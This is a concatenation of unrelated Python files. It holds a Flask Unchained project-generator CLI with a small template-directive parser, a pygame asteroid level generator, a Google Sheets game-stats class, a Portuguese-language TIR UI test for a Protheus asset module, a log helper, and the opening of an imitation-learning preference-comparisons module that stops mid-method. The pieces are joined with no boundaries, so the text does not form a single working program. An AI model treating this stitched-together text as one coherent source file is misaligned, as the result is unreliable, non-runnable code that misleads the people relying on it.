import os import re import shutil import sys from flask_unchained.cli import click from flask_unchained.click import default, skip_prompting from flask_unchained.string_utils import right_replace from jinja2 import Environment from typing import * JINJA_START_STR = '{#!' JINJA_END_STR = '#}' OTHER_START_STR = '#! ' OTHER_INLINE_START_STR = '#!(' OTHER_INLINE_END_STR = ')' env = Environment() _excluded = object() MODULE_NAME_RE = re.compile(r'^[a-zA-Z_][a-zA-Z0-9_]*$') IF_RE = re.compile(r'^if (?P<condition>.+): ?(?P<statement>.+)?$') ELIF_RE = re.compile(r'^elif (?P<condition>.+): ?(?P<statement>.+)?$') ELSE_RE = re.compile(r'^else: ?(?P<statement>.+)?$') TEMPLATES_ROOT = os.path.abspath( os.path.join(os.path.dirname(__file__), os.pardir, '_code_templates')) PROJECT_TEMPLATE = os.path.join(TEMPLATES_ROOT, 'project') def _validate_module_name(ctx, param, value): try: assert MODULE_NAME_RE.match(value) is not None return value except AssertionError: raise click.BadParameter('must be a valid python module name ' '(letters, numbers, and underscore characters only)') class Token: def __init__(self, line_num=0, token=None): self._line_num = line_num self.tokens = [] if token is not None: self.tokens.append(token) @property def line_num(self): return self._line_num + 1 @line_num.setter def line_num(self, line_num): self._line_num = line_num - 1 def render(self, ctx=None, *, _debug=False): if len(self.tokens) == 1: token = self.tokens[0] if isinstance(token, str): return token if not _debug else f'{self.line_num}: {token}' return token.render(ctx, _debug=_debug) lines = [] for t in self.tokens: result = t.render(ctx, _debug=_debug) if result is not _excluded: lines.append(result) return '\n'.join(lines) def __repr__(self): return f'{self.__class__.__name__}(tokens=\n{self.tokens!r})' class InlineToken(Token): def __init__(self, line_num, parts): super().__init__(line_num) self.tokens = parts def render(self, ctx=None, *, _debug=False): if len(self.tokens) == 1: if isinstance(self.tokens[0], (str, InlineToken)): return env.from_string(self.tokens[0]).render(**ctx) return super().render(ctx, _debug=_debug) parts = [] for t in self.tokens: if isinstance(t, str): parts.append(t) continue result = t.render(ctx, _debug=_debug) if result is not _excluded: parts.append(result) return ('' if not _debug else f'{self.line_num}: ') + ''.join(parts) def __str__(self): if len(self.tokens) > 1: return ''.join(str(t) for t in self.tokens) return self.tokens[0] class IfToken(Token): def __init__(self, line_num, condition, statement): super().__init__(line_num) self.condition = condition self.statement = statement self.next = None def render(self, ctx=None, *, _debug=False): condition = (self.condition if isinstance(self.condition, (str, bytes)) else repr(self.condition)) if not eval(condition, env.globals, ctx): if self.next: return self.next.render(ctx, _debug=_debug) return _excluded if self.statement: result = env.from_string(self.statement).render(**ctx) return result if not _debug else f'{self.line_num}: {result}' else: return super().render(ctx, _debug=_debug) def __repr__(self): return f'IfToken(cond={self.condition!r}, token={self.tokens[0]!r}, next={self.next!r})' @click.group() def new(): """ Generate new code for your Flask Unchained projects. 
""" @new.command() @click.argument('dest', type=click.Path(resolve_path=True), help='The project folder.') @click.option('-a', '--app-bundle', default='app', help='The module name to use for your app bundle.', callback=_validate_module_name) @click.option('--force/--no-force', default=False, show_default=True, help='Whether or not to force creation if project folder is not empty.') @click.option('--no-prompt', is_eager=True, is_flag=True, expose_value=False, help='Whether or not to skip prompting and just use the defaults.', default=False, show_default=True, callback=skip_prompting) @click.option('--dev/--no-dev', prompt='Development Mode', help='Whether or not to install development dependencies.', default=lambda: default(True), show_default=True) @click.option('--admin/--no-admin', prompt='Admin Bundle', help='Whether or not to install the Admin Bundle.', default=lambda: default(False), show_default=True) @click.option('--api/--no-api', prompt='API Bundle', help='Whether or not to install the API Bundle.', default=lambda: default(False), show_default=True) @click.option('--celery/--no-celery', prompt='Celery Bundle', help='Whether or not to install the Celery Bundle.', default=lambda: default(False), show_default=True) @click.option('--graphene/--no-graphene', prompt='Graphene Bundle', help='Whether or not to install the Graphene Bundle.', default=lambda: default(False), show_default=True) @click.option('--mail/--no-mail', prompt='Mail Bundle', help='Whether or not to install the Mail Bundle.', default=lambda: default(False), show_default=True) @click.option('--oauth/--no-oauth', prompt='OAuth Bundle', help='Whether or not to install the OAuth Bundle.', default=lambda: default(False), show_default=True) @click.option('--security/--no-security', prompt='Security Bundle', help='Whether or not to install the Security Bundle.', default=lambda: default(False), show_default=True) @click.option('--session/--no-session', prompt='Session Bundle', help='Whether or not to install the Session Bundle.', default=lambda: default(False), show_default=True) @click.option('--sqlalchemy/--no-sqlalchemy', prompt='SQLAlchemy Bundle', help='Whether or not to install the SQLAlchemy Bundle.', default=lambda: default(False), show_default=True) @click.option('--webpack/--no-webpack', prompt='Webpack Bundle', help='Whether or not to install the Webpack Bundle.', default=lambda: default(False), show_default=True) def project(dest, app_bundle, force, dev, admin, api, celery, graphene, mail, oauth, security, session, sqlalchemy, webpack): """ Create a new Flask Unchained project. """ if os.path.exists(dest) and os.listdir(dest) and not force: if not click.confirm(f'WARNING: Project directory {dest!r} exists and is ' f'not empty. It will be DELETED!!! 
Continue?'): click.echo(f'Exiting.') sys.exit(1) # build up a list of dependencies # IMPORTANT: keys here must match setup.py's `extra_requires` keys ctx = dict(dev=dev, admin=admin, api=api, celery=celery, graphene=graphene, mail=mail, oauth=oauth, security=security or oauth, session=security or session, sqlalchemy=security or sqlalchemy, webpack=webpack) ctx['requirements'] = [k for k, v in ctx.items() if v] # remaining ctx vars ctx['app_bundle_module_name'] = app_bundle # copy the project template into place copy_file_tree(PROJECT_TEMPLATE, dest, ctx, [ (option, files) for option, files in [('api', ['app/serializers']), ('celery', ['app/tasks', 'celery.py']), ('graphene', ['app/graphql']), ('mail', ['templates/email']), ('security', ['app/models/role.py', 'app/models/user.py', 'db/fixtures/Role.yaml', 'db/fixtures/User.yaml']), ('webpack', ['assets', 'package.json', 'webpack']), ] if not ctx[option] ]) click.echo(f'Successfully created a new project at: {dest}') def copy_file_tree(src: str, dest: str, ctx: Optional[Dict[str, Any]] = None, option_locations: Optional[List[Tuple[str, List[str]]]] = None): """ Copy the file tree under the :param:`src` directory to the :param:`dest` directory. Pass :param:`ctx` to support rendering the files, and pass :param:`option_locations` to support deleting optional files/folders. """ if os.path.exists(dest): shutil.rmtree(dest, ignore_errors=True) shutil.copytree(src, dest) if option_locations: for option, paths in option_locations: for path in paths: path = os.path.join(dest, path) if os.path.isfile(path): os.remove(path) else: shutil.rmtree(path, ignore_errors=True) if 'app_bundle_module_name' in ctx: shutil.move(os.path.join(dest, 'app'), os.path.join(dest, ctx['app_bundle_module_name'])) shutil.move(os.path.join(dest, 'tests', 'app'), os.path.join(dest, 'tests', ctx['app_bundle_module_name'])) _render_file_tree(dest, ctx) def _render_file_tree(root_dir: str, ctx: Optional[Dict[str, Any]] = None): if not ctx: return for dirpath, dirnames, filenames in os.walk(root_dir): for filename in filenames: path = os.path.join(dirpath, filename) if ('__pycache__' in path or path.endswith('.pyc') or path.endswith('.pyo')): # absolutely no idea how this happens but whenever Flask Unchained # gets installed via pip, this cache crap happens os.remove(path) continue root_token = Token() try: with open(path) as f: lines = f.read().split('\n') root_token, _ = _process_tokens(lines, root_token, is_jinja=path.endswith('.html')) except UnicodeDecodeError as e: raise Exception(f'UnicodeDecodeError: {path} ({str(e)})') with open(path, 'w') as f: f.write(root_token.render(ctx)) def _process_tokens(lines: List[str], token: Token, *, is_jinja: bool = False, _depth: int = 0, _real_start_i: int = 0): start_str = JINJA_START_STR if is_jinja else OTHER_START_STR end_str = JINJA_END_STR if is_jinja else None i: int = 0 resume_from_real_i: int = 0 for i, line in enumerate(lines): if (_real_start_i + i) < resume_from_real_i: continue stripped = line.strip() if not stripped.startswith(start_str): token.tokens.append( _extract_inline_token(line, _real_start_i + i, is_jinja)) continue stripped = stripped[len(start_str):].strip() if end_str: stripped = right_replace(stripped, end_str, '').strip() if stripped == 'endif' and _depth > 0: return token, _real_start_i + i if_m = IF_RE.match(stripped) elif_m = ELIF_RE.match(stripped) else_m = ELSE_RE.match(stripped) if not any([if_m, elif_m, else_m]) and stripped != 'endif': token.tokens.append(InlineToken(_real_start_i + i, [ 
line[:line.find(start_str)] + stripped, ])) continue next_start_i = _real_start_i + i + 1 if if_m is not None: condition = if_m.groupdict()['condition'] statement = if_m.groupdict()['statement'] if_token = IfToken(_real_start_i + i, condition, line[:line.find(start_str):] + statement if statement else None) if not statement: if_token, resume_from_real_i = _process_tokens(lines[i + 1:], if_token, is_jinja=is_jinja, _depth=_depth + 1, _real_start_i=next_start_i) token.tokens.append(if_token) elif elif_m is not None: condition = elif_m.groupdict()['condition'] statement = elif_m.groupdict()['statement'] if_token = IfToken(_real_start_i + i, condition, line[:line.find(start_str):] + statement if statement else None) if not statement: if_token, resume_from_real_i = _process_tokens(lines[i + 1:], if_token, is_jinja=is_jinja, _depth=_depth, _real_start_i=next_start_i) token.next = if_token elif else_m is not None: statement = else_m.groupdict()['statement'] if_token = IfToken(_real_start_i + i, True, line[:line.find(start_str):] + statement if statement else None) if not statement: if_token, resume_from_real_i = _process_tokens(lines[i + 1:], if_token, is_jinja=is_jinja, _depth=_depth, _real_start_i=next_start_i) token.next = if_token continue return token, _real_start_i + i def _extract_inline_token(line: str, line_num: int, is_jinja: bool = False): start_str = JINJA_START_STR if is_jinja else OTHER_INLINE_START_STR end_str = JINJA_END_STR if is_jinja else OTHER_INLINE_END_STR if start_str not in line: return Token(line_num, line) def _clean_end(part): if part.startswith(end_str): return part[len(end_str):] return part end_i = 0 parts = [] while True: start_i = line.find(start_str, end_i) if start_i == -1: remaining = _clean_end(line[end_i:]) if remaining: parts.append(remaining) break parts.append(_clean_end(line[end_i:start_i])) if is_jinja: end_i = line.find(end_str, start_i) part = line[start_i+len(start_str):end_i] else: start_i, end_i = _find_inline_start_end_indexes(line, start_i) part = line[start_i:end_i].strip() parts.append(InlineToken(line_num, [part])) return InlineToken(line_num, parts) def _find_inline_start_end_indexes(line, start_idx=0): s = OTHER_INLINE_START_STR.strip()[-1] e = OTHER_INLINE_END_STR stack = 0 last_e = len(line) for i, char in enumerate(line[start_idx:]): if char == s: stack += 1 elif char == e: stack -= 1 if stack == 0: last_e = start_idx + i break return line.find(s, start_idx) + len(s), last_e
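# --- Hedged demo of the '#!' directive mini-language (not part of the original module) --
# The two template lines below are made-up examples, not files from _code_templates.
def _demo_process_tokens():
    lines = [
        "#! if security: from app.security import SecurityController",
        "#! if celery: from app.tasks import send_welcome_email",
    ]
    root, _ = _process_tokens(lines, Token())
    # Renders to "from app.security import SecurityController"; the celery line is excluded.
    return root.render({'security': True, 'celery': False})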
import random

import pygame

from . import settings
from .object import Asteroid, PowerUp
from .sound import SoundEffect


class LevelDesign(pygame.sprite.Sprite):
    def __init__(self):
        super().__init__()
        self.current_level = 1
        self.level_design = self.generate_level()
        self.font = pygame.font.Font(settings.FONT, 15)
        self.text = f"LEVEL: {self.current_level}"
        self.image = self.font.render(self.text, 1, settings.TEXT_COLOR)
        self.rect = self.image.get_rect()
        self.rect.topleft = [270, 10]
        self.sfx = SoundEffect(settings.LEVEL_UP, 0.5)

    def update(self):
        self.text = f"LEVEL: {self.current_level}"
        self.image = self.font.render(self.text, 1, settings.TEXT_COLOR)

    def get_level(self):
        return self.level_design

    def next_level(self):
        self.sfx.play()
        self.current_level += 1
        self.level_design = self.generate_level()
        return self.level_design

    def _get_enemies(self):
        """Generates the enemies for the level: three asteroids per level number."""
        num = self.current_level * 3  # Total number of asteroids on this level.
        enemies = []
        for _ in range(num):
            x = random.randint(600, 2000)
            y = random.randint(settings.LIMIT_UP, settings.LIMIT_DOWN)
            pos = [x, y]
            speed = [random.randint(3, 6), 0]
            enemies.append(Asteroid(settings.ASTEROID_SPRITE, pos, speed))
        return enemies

    def _get_powerups(self):
        """Generates one or zero powerups for the level."""
        num = random.randint(0, 1)
        powerups = []
        for _ in range(num):
            x = random.randint(600, 2000)
            y = random.randint(settings.LIMIT_UP, settings.LIMIT_DOWN)
            pos = [x, y]
            powerups.append(PowerUp(settings.POWER_UP_SPRITE, pos))
        return powerups

    def generate_level(self):
        """Returns a tuple (enemies, powerups) with all objects for the level."""
        enemies = self._get_enemies()
        powerups = self._get_powerups()
        objs = (enemies, powerups)
        return objs
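# Quick check of the asteroid counts produced by LevelDesign._get_enemies above
# (three asteroids per level number):
for level in (1, 2, 3, 5, 10):
    print(level, level * 3)   # 3, 6, 9, 15 and 30 asteroids respectively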
import sys

import gspread
from oauth2client.service_account import ServiceAccountCredentials


class CloudSave:
    def __init__(self, sheet, credentials_file):
        try:
            scope = ["https://spreadsheets.google.com/feeds",
                     "https://www.googleapis.com/auth/drive"]
            credentials = ServiceAccountCredentials.from_json_keyfile_name(
                credentials_file, scope)
            gc = gspread.authorize(credentials)
        except OSError:
            print("JSON file with Google account credentials not found!"
                  "\nPlease make sure credentials.json exists in the root directory")
            sys.exit(1)

        self.datasheet = gc.open(sheet).worksheet("data")  # Open the Google sheet
        self._update()

    def add_win(self, player_number):
        if player_number == 1:
            self.datasheet.update("E6", self.p1_data["wins"] + 1)
            self.datasheet.update("E9", self.p1_data["current_win_streak"] + 1)
            self.datasheet.update("E8", max(
                self.p1_data["current_win_streak"] + 1,
                self.p1_data["longest_win_streak"]))
            self.datasheet.update("J9", 0)
        elif player_number == 2:
            self.datasheet.update("J6", self.p2_data["wins"] + 1)
            self.datasheet.update("J9", self.p2_data["current_win_streak"] + 1)
            self.datasheet.update("J8", max(
                self.p2_data["current_win_streak"] + 1,
                self.p2_data["longest_win_streak"]))
            self.datasheet.update("E9", 0)
        self.datasheet.update("E2", self.total_games + 1)
        self._update()

    # Clear all stored data (each tracked cell is reset exactly once)
    def reset(self):
        self.datasheet.update("E6", 0)
        self.datasheet.update("E8", 0)
        self.datasheet.update("E9", 0)
        self.datasheet.update("J6", 0)
        self.datasheet.update("J8", 0)
        self.datasheet.update("J9", 0)
        self.datasheet.update("E2", 0)
        self._update()

    def display_info(self, choice):
        if choice == 0:
            print(f"Total games played: {self.total_games}")
        elif choice == 1:
            print(f"Player 1 Wins: {self.p1_data['wins']}")
            print(f"Current winstreak : {self.p1_data['current_win_streak']}")
            print(f"Longest winstreak : {self.p1_data['longest_win_streak']}")
        elif choice == 2:
            print(f"Player 2 Wins: {self.p2_data['wins']}")
            print(f"Current winstreak : {self.p2_data['current_win_streak']}")
            print(f"Longest winstreak : {self.p2_data['longest_win_streak']}")

    # Load stats from the Google sheet
    def _update(self):
        self.total_games = int(self.datasheet.cell(2, 5).value)
        self.p1_data = {"wins": int(self.datasheet.cell(6, 5).value),
                        "longest_win_streak": int(self.datasheet.cell(8, 5).value),
                        "current_win_streak": int(self.datasheet.cell(9, 5).value)}
        self.p2_data = {"wins": int(self.datasheet.cell(6, 10).value),
                        "longest_win_streak": int(self.datasheet.cell(8, 10).value),
                        "current_win_streak": int(self.datasheet.cell(9, 10).value)}
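# Hedged usage sketch for the CloudSave class above. "Tic Tac Toe Stats" and
# "credentials.json" are hypothetical names; any shared Google Sheet with a
# "data" worksheet laid out as the class expects would work.
if __name__ == "__main__":
    cloud = CloudSave("Tic Tac Toe Stats", "credentials.json")
    cloud.display_info(0)   # total games played
    cloud.add_win(1)        # record a win for player 1
    cloud.display_info(1)   # player 1 stats, including the updated win streak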
from tir import Webapp import unittest class ATFA380(unittest.TestCase): @classmethod def setUpClass(inst): inst.oHelper = Webapp() inst.oHelper.Setup("SIGAATF", "01/04/2016", "T1", "M SP 01 ", "01") inst.oHelper.Program("ATFA380") def test_ATFA380_001(self): #INCLUI UM REGISTRO, OBS: A NUMERAÇÃO É AUTOMATICA. self.oHelper.SetButton("Incluir") self.oHelper.SetBranch("M SP 01 ") self.oHelper.SetButton("Avançar") self.oHelper.SetButton("Avançar") #Parâmetros de perguntes self.oHelper.SetValue("MV_PAR01","ATF11001", name_attr=True) #Bem de self.oHelper.SetValue("MV_PAR02","ATF11001", name_attr=True) #Bem até self.oHelper.SetValue("MV_PAR03","", name_attr=True) #Grupo de self.oHelper.SetValue("MV_PAR04","ZZZZ", name_attr=True) #Grupo até self.oHelper.SetValue("MV_PAR05","", name_attr=True) #Centro de Custo de self.oHelper.SetValue("MV_PAR06","ZZZZZZZZZ",name_attr=True) #Centro de Custo até self.oHelper.SetValue("MV_PAR07","101010200005",name_attr=True ) #Conta de self.oHelper.SetValue("MV_PAR08","101010200005",name_attr=True ) #Conta até self.oHelper.SetValue("MV_PAR11" , "" , name_attr=True ) #Item de self.oHelper.SetValue("MV_PAR12" , "ZZZZ" , name_attr=True ) #Item até self.oHelper.SetButton("Avançar") self.oHelper.SetValue("Simular", True) self.oHelper.SetButton("Finalizar") self.oHelper.CheckResult("NJ_ITEM","000001", grid=True, line=1)#NJ_ITEM self.oHelper.CheckResult("NJ_BEM","ATF11001 ", grid=True, line=1)#NJ_BEM self.oHelper.CheckResult("NJ_TIPO","01", grid=True, line=1)#NJ_TIPO self.oHelper.CheckResult("NJ_VLREC01","100,00", grid=True, line=1)#NJ_VLREC01 self.oHelper.CheckResult("NJ_VLTAX01","10,00", grid=True, line=1)#NJ_VLTAX01 self.oHelper.CheckResult("NJ_VLORI01","100,00", grid=True, line=1)#NJ_VLORI01 self.oHelper.CheckResult("NJ_TPDEPR","Linear", grid=True, line=1)#NJ_TPDEPR #Carrega a grid com as atualizações alteradas e/ou para checar self.oHelper.LoadGrid() self.oHelper.SetButton("Salvar") self.oHelper.SetButton("Cancelar") self.oHelper.AssertTrue() def test_ATFA380_002(self): process = '00000000000000000008' self.oHelper.SearchBrowse(f"M SP 01 {process}", "Filial+processo") self.oHelper.SetButton("Alterar") self.oHelper.SetButton("Avançar") self.oHelper.SetButton("Avançar") self.oHelper.SetButton("Avançar") self.oHelper.SetValue("Simular", True) self.oHelper.SetButton("Finalizar") self.oHelper.SetValue("Valor", "100,00", grid=True,row=1)#NJ_VLREC01 Valor self.oHelper.SetValue("Taxa", "99,00", grid=True,row=1)#NJ_VLTAX01 Taxa self.oHelper.SetValue("Venda","125,00", grid=True,row=1)#NJ_VLACMD01 Venda self.oHelper.LoadGrid() self.oHelper.CheckResult("NJ_VLREC01", "100,00", grid=True,line=1)#NJ_VLREC01 self.oHelper.CheckResult("NJ_VLTAX01", "99,00", grid=True,line=1)#NJ_VLTAX01 self.oHelper.CheckResult("NJ_VLVEN01", "125,00", grid=True,line=1)#NJ_VLVEN01 self.oHelper.LoadGrid() self.oHelper.SetButton("Salvar") self.oHelper.AssertTrue() def test_ATFA380_003(self): process = '00000000000000000007' self.oHelper.SearchBrowse(f"M SP 01 {process}", "Filial+processo") self.oHelper.SetButton("Visualizar") self.oHelper.SetButton("Avançar") self.oHelper.SetButton("Avançar") self.oHelper.SetButton("Avançar") self.oHelper.SetButton("Finalizar") self.oHelper.CheckResult("NJ_ITEM","000001", grid=True, line=1) self.oHelper.CheckResult("NJ_BEM","ATF11003", grid=True, line=1) self.oHelper.CheckResult("NJ_TIPO","01", grid=True, line=1) self.oHelper.CheckResult("NJ_VLREC01","50,00", grid=True, line=1) self.oHelper.CheckResult("NJ_VLTAX01","10,00", grid=True, line=1) 
self.oHelper.CheckResult("NJ_TPDEPR","Linear", grid=True, line=1) self.oHelper.CheckResult("NJ_VLORI01","100,00", grid=True, line=1) self.oHelper.LoadGrid() self.oHelper.SetButton("Confirmar") self.oHelper.AssertTrue() def test_ATFA380_004(self): process = '00000000000000000009' #Alteração de simulação de Redução ao valor recuperavel de um Ativo/bem self.oHelper.SearchBrowse(f"M SP 01 {process}", "Filial+processo") self.oHelper.SetButton("Outras ações", "Excluir") self.oHelper.SetButton("Avançar") self.oHelper.SetButton("Avançar") self.oHelper.SetButton("Avançar") self.oHelper.SetButton("Finalizar") self.oHelper.SetButton("Confirmar") self.oHelper.SearchBrowse(f"M SP 01 {process}", "Filial+processo") self.oHelper.SetButton("Visualizar") self.oHelper.SetButton("Avançar") self.oHelper.CheckResult("NI_PROC", process, name_attr=True) self.oHelper.SetButton("Avançar") self.oHelper.SetButton("Finalizar") self.oHelper.SetButton("Confirmar") self.oHelper.AssertFalse() def test_ATFA380_005(self): ##Efetivação de um registro de simulaçao de Redução ao Valor Recuperavel de um Ativo/Bem ##Parametros de ultima depreciação para poder efetivar o registro, use caso nao tenha feito na base manualmente, se não comente self.oHelper.AddParameter("MV_ULTDEPR","M SP 01","20160331","20160331","20160331") self.oHelper.SetParameters() process = '00000000000000000010' self.oHelper.SearchBrowse(f"M SP 01 {process}", "Filial+processo") self.oHelper.SetButton("Outras ações", "Efetivar") self.oHelper.SetButton("Avançar") self.oHelper.SetButton("Avançar") self.oHelper.SetButton("Avançar") self.oHelper.SetButton("Finalizar") self.oHelper.SetButton("Confirmar") self.oHelper.SearchBrowse(f"M SP 01 {process}", "Filial+processo") self.oHelper.SetButton("Visualizar") self.oHelper.SetButton("Avançar") self.oHelper.CheckResult("NI_STATUS", "2 - Efetivação",grid=False) self.oHelper.SetButton("Avançar") self.oHelper.SetButton("Finalizar") self.oHelper.SetButton("Confirmar") self.oHelper.AssertTrue() self.oHelper.RestoreParameters() def test_ATFA380_006(self): #Validar Helps ##Validação de Helps de um registro de efetivação ja efetuada e nem que pode ser excluida pois ja foi efetuada. 
process = '00000000000000000010' #mudar depois na base congelada o registro self.oHelper.SearchBrowse(f"M SP 01 {process}", "Filial+processo") self.oHelper.SetButton("Outras ações", "Efetivar") self.oHelper.SetButton("OK") self.oHelper.SetButton("Outras ações", "Excluir") self.oHelper.SetButton("OK") self.oHelper.AssertTrue() def test_ATFA380_007(self): process = '00000000000000000010' self.oHelper.SearchBrowse(f"M SP 01 {process}", "Filial+processo") self.oHelper.SetButton("Outras ações", "Exportar") self.oHelper.SetButton("Avançar") self.oHelper.SetButton("Avançar") #### self.oHelper.SetValue("MV_PAR01","ATF380EXPORT",grid=False) self.oHelper.SetValue("MV_PAR02","\\spool\\") #self.oHelper.SetValue("MV_PAR02",r"C:\ProtheusT\\Base_congeladaSistemico\\exports\\",) ###Aguardando retorno para #self.oHelper.SetFilePath(r"C:\\ProtheusT\\Base_congeladaSistemico\\exports\\") ### #### self.oHelper.SetButton("Finalizar") self.oHelper.SetButton("Confirmar") self.oHelper.CheckView("Exportacao gerada com sucesso",element_type=help) self.oHelper.SetButton("Ok") self.oHelper.AssertTrue() def test_ATFA380_008(self): #INCLUI UM REGISTRO efetivado, mesmos registros do de inclusao de simulação 001 self.oHelper.SetButton("Incluir") self.oHelper.SetBranch("M SP 01 ") self.oHelper.SetButton("Avançar") self.oHelper.SetButton("Avançar") self.oHelper.SetValue("MV_PAR01","ATF11001", name_attr=True) #Bem de self.oHelper.SetValue("MV_PAR02","ATF11001", name_attr=True) #Bem até self.oHelper.SetValue("MV_PAR03","", name_attr=True) #Grupo de self.oHelper.SetValue("MV_PAR04","ZZZZ", name_attr=True) #Grupo até self.oHelper.SetValue("MV_PAR05","", name_attr=True) #Centro de Custo de self.oHelper.SetValue("MV_PAR06","ZZZZZZZZZ",name_attr=True) #Centro de Custo até self.oHelper.SetValue("MV_PAR07","101010200005",name_attr=True ) #Conta de self.oHelper.SetValue("MV_PAR08","101010200005",name_attr=True ) #Conta até self.oHelper.SetValue("MV_PAR11" , "" , name_attr=True ) #Item de self.oHelper.SetValue("MV_PAR12" , "ZZZZ" , name_attr=True ) #Item até self.oHelper.SetButton("Avançar") self.oHelper.SetValue("Simular", False) self.oHelper.SetButton("Finalizar") self.oHelper.CheckResult("NJ_ITEM","000001", grid=True, line=1)#NJ_ITEM self.oHelper.CheckResult("NJ_BEM","ATF11001 ", grid=True, line=1)#NJ_BEM self.oHelper.CheckResult("NJ_TIPO","01", grid=True, line=1)#NJ_TIPO self.oHelper.CheckResult("NJ_VLREC01","100,00", grid=True, line=1)#NJ_VLREC01 self.oHelper.CheckResult("NJ_VLTAX01","10,00", grid=True, line=1)#NJ_VLTAX01 self.oHelper.CheckResult("NJ_VLORI01","100,00", grid=True, line=1)#NJ_VLORI01 self.oHelper.CheckResult("NJ_TPDEPR","Linear", grid=True, line=1)#NJ_TPDEPR self.oHelper.LoadGrid() self.oHelper.SetButton("Salvar") self.oHelper.SetButton("Cancelar") self.oHelper.AssertTrue() @classmethod def tearDownClass(inst): inst.oHelper.TearDown() if __name__ == '__main__': unittest.main()
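# Sketch (assumes a configured TIR/Protheus environment): because the suite
# above is plain unittest, a single case can also be selected and run
# programmatically with the standard unittest loader, e.g. from another script.
import unittest

suite = unittest.defaultTestLoader.loadTestsFromName("ATFA380.ATFA380.test_ATFA380_001")
unittest.TextTestRunner(verbosity=2).run(suite)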
import datetime


def log(message):
    """Print a status message with an HH:MM:SS timestamp."""
    print(f"[ LOG ] status : {message} --> {datetime.datetime.now().strftime('%H:%M:%S')}")
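# Example of the output format produced by log() above (the timestamp will vary):
log("connection established")
# [ LOG ] status : connection established --> 14:03:27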
"""Learning reward models using preference comparisons. Trains a reward model and optionally a policy based on preferences between trajectory fragments. """ import abc import math import pickle import random from typing import Any, Callable, List, Mapping, Optional, Sequence, Tuple, Union import numpy as np import torch as th from scipy import special from stable_baselines3.common import base_class, vec_env from imitation.algorithms import base from imitation.data import rollout, types, wrappers from imitation.data.types import ( AnyPath, TrajectoryPair, TrajectoryWithRew, TrajectoryWithRewPair, Transitions, ) from imitation.policies import exploration_wrapper from imitation.rewards import common as rewards_common from imitation.rewards import reward_nets, reward_wrapper from imitation.util import logger as imit_logger from imitation.util import networks class TrajectoryGenerator(abc.ABC): """Generator of trajectories with optional training logic.""" _logger: imit_logger.HierarchicalLogger """Object to log statistics and natural language messages to.""" def __init__(self, custom_logger: Optional[imit_logger.HierarchicalLogger] = None): """Builds TrajectoryGenerator. Args: custom_logger: Where to log to; if None (default), creates a new logger. """ self.logger = custom_logger or imit_logger.configure() @abc.abstractmethod def sample(self, steps: int) -> Sequence[TrajectoryWithRew]: """Sample a batch of trajectories. Args: steps: All trajectories taken together should have at least this many steps. Returns: A list of sampled trajectories with rewards (which should be the environment rewards, not ones from a reward model). """ # noqa: DAR202 def train(self, steps: int, **kwargs): """Train an agent if the trajectory generator uses one. By default, this method does nothing and doesn't need to be overridden in subclasses that don't require training. Args: steps: number of environment steps to train for. **kwargs: additional keyword arguments to pass on to the training procedure. """ @property def logger(self) -> imit_logger.HierarchicalLogger: return self._logger @logger.setter def logger(self, value: imit_logger.HierarchicalLogger): self._logger = value class TrajectoryDataset(TrajectoryGenerator): """A fixed dataset of trajectories.""" def __init__( self, trajectories: Sequence[TrajectoryWithRew], seed: Optional[int] = None, custom_logger: Optional[imit_logger.HierarchicalLogger] = None, ): """Creates a dataset loaded from `path`. Args: trajectories: the dataset of rollouts. seed: Seed for RNG used for shuffling dataset. custom_logger: Where to log to; if None (default), creates a new logger. """ super().__init__(custom_logger=custom_logger) self._trajectories = trajectories self.rng = random.Random(seed) def sample(self, steps: int) -> Sequence[TrajectoryWithRew]: # make a copy before shuffling trajectories = list(self._trajectories) self.rng.shuffle(trajectories) return _get_trajectories(trajectories, steps) class AgentTrainer(TrajectoryGenerator): """Wrapper for training an SB3 algorithm on an arbitrary reward function.""" def __init__( self, algorithm: base_class.BaseAlgorithm, reward_fn: Union[rewards_common.RewardFn, reward_nets.RewardNet], exploration_frac: float = 0.0, switch_prob: float = 0.5, random_prob: float = 0.5, seed: Optional[int] = None, custom_logger: Optional[imit_logger.HierarchicalLogger] = None, ): """Initialize the agent trainer. Args: algorithm: the stable-baselines algorithm to use for training. Its environment must be set. 
reward_fn: either a RewardFn or a RewardNet instance that will supply the rewards used for training the agent. exploration_frac: fraction of the trajectories that will be generated partially randomly rather than only by the agent when sampling. switch_prob: the probability of switching the current policy at each step for the exploratory samples. random_prob: the probability of picking the random policy when switching during exploration. seed: random seed for exploratory trajectories. custom_logger: Where to log to; if None (default), creates a new logger. Raises: ValueError: `algorithm` does not have an environment set. """ self.algorithm = algorithm # NOTE: this has to come after setting self.algorithm because super().__init__ # will set self.logger, which also sets the logger for the algorithm super().__init__(custom_logger) if isinstance(reward_fn, reward_nets.RewardNet): reward_fn = reward_fn.predict self.reward_fn = reward_fn self.exploration_frac = exploration_frac venv = self.algorithm.get_env() if not isinstance(venv, vec_env.VecEnv): raise ValueError("The environment for the agent algorithm must be set.") # The BufferingWrapper records all trajectories, so we can return # them after training. This should come first (before the wrapper that # changes the reward function), so that we return the original environment # rewards. self.buffering_wrapper = wrappers.BufferingWrapper(venv) self.venv = reward_wrapper.RewardVecEnvWrapper( self.buffering_wrapper, self.reward_fn, ) self.log_callback = self.venv.make_log_callback() self.algorithm.set_env(self.venv) policy = rollout._policy_to_callable( self.algorithm, self.venv, deterministic_policy=True, ) self.exploration_wrapper = exploration_wrapper.ExplorationWrapper( policy=policy, venv=self.venv, random_prob=random_prob, switch_prob=switch_prob, seed=seed, ) def train(self, steps: int, **kwargs) -> None: """Train the agent using the reward function specified during instantiation. Args: steps: number of environment timesteps to train for **kwargs: other keyword arguments to pass to BaseAlgorithm.train() Raises: RuntimeError: Transitions left in `self.buffering_wrapper`; call `self.sample` first to clear them. """ n_transitions = self.buffering_wrapper.n_transitions if n_transitions: raise RuntimeError( f"There are {n_transitions} transitions left in the buffer. " "Call AgentTrainer.sample() first to clear them.", ) self.algorithm.learn( total_timesteps=steps, reset_num_timesteps=False, callback=self.log_callback, **kwargs, ) def sample(self, steps: int) -> Sequence[types.TrajectoryWithRew]: agent_trajs, _ = self.buffering_wrapper.pop_finished_trajectories() # We typically have more trajectories than are needed. # In that case, we use the final trajectories because # they are the ones with the most relevant version of # the agent. # The easiest way to do this will be to first invert the # list and then later just take the first trajectories: agent_trajs = agent_trajs[::-1] avail_steps = sum(len(traj) for traj in agent_trajs) exploration_steps = int(self.exploration_frac * steps) if self.exploration_frac > 0 and exploration_steps == 0: self.logger.warn( "No exploration steps included: exploration_frac = " f"{self.exploration_frac} > 0 but steps={steps} is too small.", ) agent_steps = steps - exploration_steps if avail_steps < agent_steps: self.logger.log( f"Requested {agent_steps} transitions but only {avail_steps} in buffer." 
